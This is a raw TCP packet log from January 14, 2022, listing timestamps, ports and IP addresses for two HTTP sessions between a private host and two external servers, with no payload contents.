Jan 14, 2022 00:16:13.623663902 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.623701096 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.623723030 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.623739958 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.623779058 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.623800039 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.623816967 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.623856068 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.623877048 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.623903036 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.623945951 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.623971939 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.623986006 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.624018908 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.624047041 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.624737978 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.624809027 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.624830961 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.624876976 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.624914885 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.624953985 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.624957085 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.625013113 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.651357889 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.651405096 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.651446104 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.651472092 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.651487112 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.651531935 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.651550055 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.651587009 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.651626110 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.651664972 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.651669025 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.651710033 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.651731968 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.651748896 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.651789904 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.651808023 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.651818991 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.651859999 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.651881933 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.651897907 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.651938915 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.651961088 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.651981115 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.652019024 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.652040005 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.652057886 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.652096987 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.652118921 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.652133942 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.652174950 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.652192116 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.652214050 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.652251959 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.652271032 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.652292013 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.652328968 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.652348042 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.652368069 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.652406931 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.652424097 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.652510881 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.652549982 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.652570009 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.652589083 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.652626038 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.652656078 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.652664900 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.652704954 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.652721882 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.652745008 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.652782917 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.652801991 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.652821064 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.652858973 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.652878046 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.652896881 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.652931929 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.652951956 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.652971029 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.653036118 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.653532982 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.653562069 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.653588057 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.653611898 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.653636932 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.653661013 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.655014992 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.655410051 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.655697107 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.655723095 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.655740023 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.655740976 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.655917883 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.655940056 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.655967951 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.656045914 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.656141043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.656224966 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.656291008 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.656311035 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.656414032 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.656502008 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.656589031 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.656795979 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.656914949 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.657020092 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.657121897 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.657215118 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.657315969 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.657408953 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.657516003 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.657614946 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.657712936 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.657815933 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.657913923 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.658008099 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.658041000 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.658112049 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.664810896 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.664836884 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.665554047 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.667583942 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.667609930 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.667783022 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.671345949 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.675792933 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.676237106 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.676574945 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.680057049 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.680097103 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.680136919 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.680160999 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.680177927 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.680218935 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.680248022 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.680258989 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.680299997 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.680316925 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.680341005 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.680378914 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.680399895 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.680417061 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.680457115 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.680474043 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.680497885 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.680535078 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.680553913 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.680572987 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.680612087 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.680630922 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.680650949 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.680691004 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.680710077 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.680730104 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.680768967 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.680787086 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.680809021 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.680845022 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.680861950 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.680885077 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.680923939 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.680938005 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.681008101 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.681046009 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.681065083 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.681087017 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.681127071 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.681147099 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.681164026 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.681196928 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.681233883 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.681238890 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.681271076 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.681303978 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.681308985 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.681349993 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.681374073 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.681389093 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.681427956 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.681451082 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.681467056 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.681505919 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.681526899 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.681545973 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.681582928 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.681605101 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.681623936 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.681660891 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.681693077 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.681694984 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.681751013 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.698018074 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.698064089 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.698103905 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.698141098 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.698147058 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.698199034 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.698203087 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.707282066 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.707339048 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.707365036 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.707380056 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.707417965 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.707441092 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.707458019 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.707516909 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.707983971 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.708024979 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.708065033 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.708084106 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.708106041 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.708142996 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.708178997 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.708183050 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.708225012 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.708241940 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.708264112 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.708302975 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.708318949 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.708340883 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.708384991 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.708400011 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.708425045 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.708465099 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.708482981 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.708506107 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.708544970 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.708561897 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.708585024 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.708623886 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.708662987 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.708667994 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.708709955 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.708726883 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.708772898 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.708837986 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.708880901 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.708926916 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.708971977 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.708992004 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.709011078 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.709057093 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.709068060 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.709103107 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.709161997 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.709201097 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.709217072 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.709255934 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.709285021 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.709296942 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.709333897 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.709357023 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.709372997 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.709408998 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.709448099 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.709456921 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.709490061 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.709510088 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.709533930 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.709573984 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.709611893 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.709616899 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.709673882 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.714373112 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.721937895 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.722908974 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.723090887 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.724698067 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.724740028 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.724826097 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.734024048 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.734067917 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.734107018 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.734143972 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.734149933 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.734224081 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.740772963 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.740816116 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.740852118 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.740890026 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.740930080 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.740957975 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.740967035 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.740972996 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.741008043 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.741033077 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.741048098 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.741086960 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.741111040 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.741126060 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.741164923 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.741185904 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.741204977 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.741244078 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.741265059 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.741281033 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.741319895 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.741341114 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.741359949 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.741399050 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.741419077 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.741440058 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.741480112 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.741501093 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.741519928 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.741559029 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.741580009 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.741596937 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.741635084 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.741664886 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.741672039 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.741712093 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.741733074 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.741750956 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.741787910 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.741810083 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.741828918 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.741902113 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.741904020 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.741942883 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.741980076 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.742002964 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.742022038 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.742059946 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.742074966 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.742100954 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.742140055 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.742155075 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.742177010 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.742216110 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.742232084 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.742254972 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.742290974 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.742307901 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.742330074 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.742367983 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.742384911 CET	49916	80	192.168.2.4	185.163.204.24
